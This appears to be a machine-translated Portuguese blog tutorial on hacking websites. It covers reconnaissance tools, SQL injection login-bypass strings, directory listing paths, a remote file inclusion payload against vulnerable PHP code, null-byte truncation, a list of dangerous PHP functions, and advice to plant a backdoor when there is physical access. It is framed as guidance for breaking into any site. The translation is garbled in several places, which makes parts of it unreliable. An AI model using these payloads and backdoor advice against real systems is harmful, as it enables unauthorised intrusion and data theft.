Como cortar um site?
Todos sabemos que a pirataria não é mais do que a habilidade deste século.
Então, o que isso significa? '
Isso significa que nem todos podem obter essa habilidade. Então você pode ver o quão privilegiado é conhecer o hackeamento, em outras mãos é como um esporte, alguns nascem com o talento, alguns têm que praticar muito para obter as habilidades necessárias.
Por que parar um site? Nós não somos nós brancos?
Mesmo no caso de você nunca ter tido um hack bem sucedido antes de assumir que, uma vez que você está aqui, você já sabe qual é o significado da foto acima (a imagem parece um pouco assustadora e mais como uma atitude de chapéu negro), a classificação dos hackers realmente faz Não tenho muito sentido, na minha opinião, há novatos, hackers, hackers experientes e, pior ainda, os skids ao redor, mesmo como um chapéu branco (de acordo com o que o mundo define como chapéu branco) às vezes você se encontrará em situações Onde você tem que trazer um buraco * porque eles estão executando sites não humanos como pornografia infantil e etc.ESTÁ BEM! Então, como cortar um site?
Há um monte de tutoriais aqui em null --- byte e em toda a internet sobre como cortar um site com uma ferramenta específica, caso queira aprender que você está no lugar certo, apenas olhe ao redor, mas hoje eu quero compartilhar Algo que eu acho que será muito útil para você, pegue uma xícara de café, pegue sua cadeira e comece a ler isso, o que eu vou mostrar hoje é totalmente diferente dos meus outros tutoriais, em vez de mostrar como usar essas ferramentas , Guiá-lo-ei sobre como você pode usar com êxito essas ferramentas e truques para cortar qualquer site, com base em minhas experiências.Abaixo está a minha lista quando eu quero cortar um site
O Reconhecimento
Meu conselho sobre boa reconciliação
Quais são os serviços que eles estão executando?Descreva coisas como portas abertas, software e versões no servidor, e tente procurar o exploit no caso de haver pelo menos um online, ou você pode apenas fazer sua própria exploração.
As ferramentas que eu recomendo para esta seção são nmap, whatweb e nikto e, claro, algumas outras feitas por Mr_ Nakup3nda ou você.
Caso escrevessem por si mesmos, procure por scripts que levem entrada de usuários, escaneie a listagem de diretórios, verifique o código-fonte e descubra como o site reage a entradas anormais, eu costumo usar essas entradas:
ADMIN 'OU 1 = 1 # quando é um URL de administrador como website / admin / loign /
'OU' 1 '=' 1 '-
'OR' 1 '=' 1 '({
'OU' 1 '=' 1 '/ *
, Mas não termina aqui, tente escrever instruções sql sobre as entradas, faça o eco de volta para você, tente executar um comando com base no sistema operacional do servidor, descubra como o site filtra as entradas e tenta ignorar os filtros.
E no caso de usar o código de outra pessoa, como o CMS, pegue uma cópia dele e tente encontrar bugs por conta própria ou encontre uma explicação se eles usam uma versão explorável do CMS.
The Evil Google
Alterando o código fonte
Aposto que neste ponto você já sabe como ver o código-fonte de uma página da web usando o truque do botão direito, apenas para lembrar que linguagens de script como php, perl, asp, python e assim por diante são executadas no lado do servidor, então Significa que você não pode ver por clique direito, a menos que seja uma plataforma de código aberto, onde você pode obter uma cópia dele e alterar o código inteiro.Listagem de diretório
A navegação de índice pode ser muito útil ao tentar encontrar arquivos que você normalmente não deve ver como arquivos de senha, arquivos usados para administrar a página da Web, arquivos de log, todos os arquivos onde as informações são armazenadas.Website.com/logs/
Website.com/files/
Website.com/sql/
Website.com/secret/
Você pode criar ferramentas que o farão automaticamente, ferramentas como o dirbsuter podem ser muito úteis para essa tarefa.
Meu amigo robots.txt
Inclusão de arquivos remotos
A vulnerabilidade de inclusão de arquivos é um tipo de vulnerabilidade mais freqüentemente encontrada em sites. Ele permite que um invasor inclua um arquivo, geralmente através de um script no servidor da Web. A vulnerabilidade ocorre devido ao uso da entrada fornecida pelo usuário sem uma validação adequada. Abaixo, temos um pedaço de código php que abre um arquivo.Se (! ($ Hfile = fopen ("$ file", "r"))
Echo ("erro não pode abrir o arquivo: $ arquivo <br /> \ n");
?>
Este exemplo abre o arquivo com o nome especificado na entrada do usuário ($ file).
Isso significa que ele abre todos os arquivos que um atacante deseja abrir e se permitir que o URL esteja ativado, mesmo arquivos remotos.
Procure por exemplo nesta parte do código:
Exemplo:
<? Php
Incluir ($ dir. "/members.php");
?>
Basta criar um arquivo .members.php no seu servidor web e chamar o script como este:
Dir = http://www.server.com/
Bytes NULL
O nome da nossa comunidade pode ser e é uma vulnerabilidade muito popular na vida hackeada.Digamos que eles têm um script que leva o nome do arquivo que ele recebe e coloca ".txt" no final. Então, o programador tenta certificar-se de que apenas os arquivos txt podem ser abertos.
Phppage.php% 00
Chegará a:
Phppage.php% 00.txt
Então, fopen abre phppage.php% 00.txt ou? Não! E este é o ponto. As funções fopen param depois
".php" antes do Byte NULL e abre apenas "phppage.php". Então, todos os tipos de arquivos podem ser abertos.
Scripts que permitem uploads (mas apenas para um determinado tipo de arquivo) também são um alvo potencial para esse tipo de ataque.
Injeção SQL
A injeção de SQL é uma técnica de injeção de código, usada para atacar aplicativos orientados a dados, nos quais as instruções SQL maliciosas são inseridas em um campo de entrada para execução, na minha experiência pessoal, esse é o problema mais popular que você encontrará em sites, o problema é que Alguns sites colocam essas informações em um banco de dados e nem todos os filtram.Se eles estiverem registrados, a última parte deve causar um erro sql que pode nos fornecer uma grande quantidade de informações úteis.
Você pode tentar o seguinte site.com/users.php?id=1
E adicione o / '/ website.com/users.php?id=1'
Se ele lança um erro no bingo, você está lá.
Forças cruzadas de pedidos cruzados (CSRF) e injeção de comando
Sobre este tipo de ataque, eu também fiz um tutorial sobre como você pode prosseguir este tipo de ataquesFunções PHP Exploitáveis
Execução de código:Require () - lê um arquivo e interpreta o conteúdo como código PHP
Include () - lê um arquivo e interpreta o conteúdo como código PHP
Eval () - interprete a string como código PHP
Preg replace () - se ele usa o modificador / e ele interpreta a seqüência de substituição como código PHP
Execução do comando:
Exec () - executa comando + retorna a última linha de sua saída
Passthru () - executa o comando + retorna sua saída para o navegador remoto
(Backticks) - executa o comando e retorna a saída em uma matriz
Shellexec - executa comando + retorna saída como string
System () - executa comando + retorna sua saída (muito parecida com passthru ())
Não podemos lidar com dados binários
Popen () - executa o comando + liga sua saída ou fluxo de entrada para um descritor de arquivo PHP
Fopen () - abre um arquivo e o associa com um descritor de arquivo PHP
Readfile () - lê um arquivo e grava seu conteúdo diretamente no navegador remoto
Arquivo () - lê um arquivo inteiro em uma matriz
Arquivo get contents () - lê o arquivo em uma string
Força Bruta
Às vezes, você irá tentar todos os métodos mencionados acima, mas alguns sites são realmente seguros e não existe uma maneira fácil de explorá-los.Acesso físico
Se você tem acesso físico ao servidor, você recebe tudo em suas mãos, seja discreto e deixe uma porta traseira nele e você fez.Outros tipos de ataques que você também pode realizar são:
Estouro do bufferEstouro de pilha
Incessante Inteiro
E a lista é longa, eu simplesmente compartilhei o que eu tenho agora na minha mente, você também pode adicionar o seu nas seções de comentários ... vejo você em breve nos próximos tutoriais.
Nenhum comentário:
Postar um comentário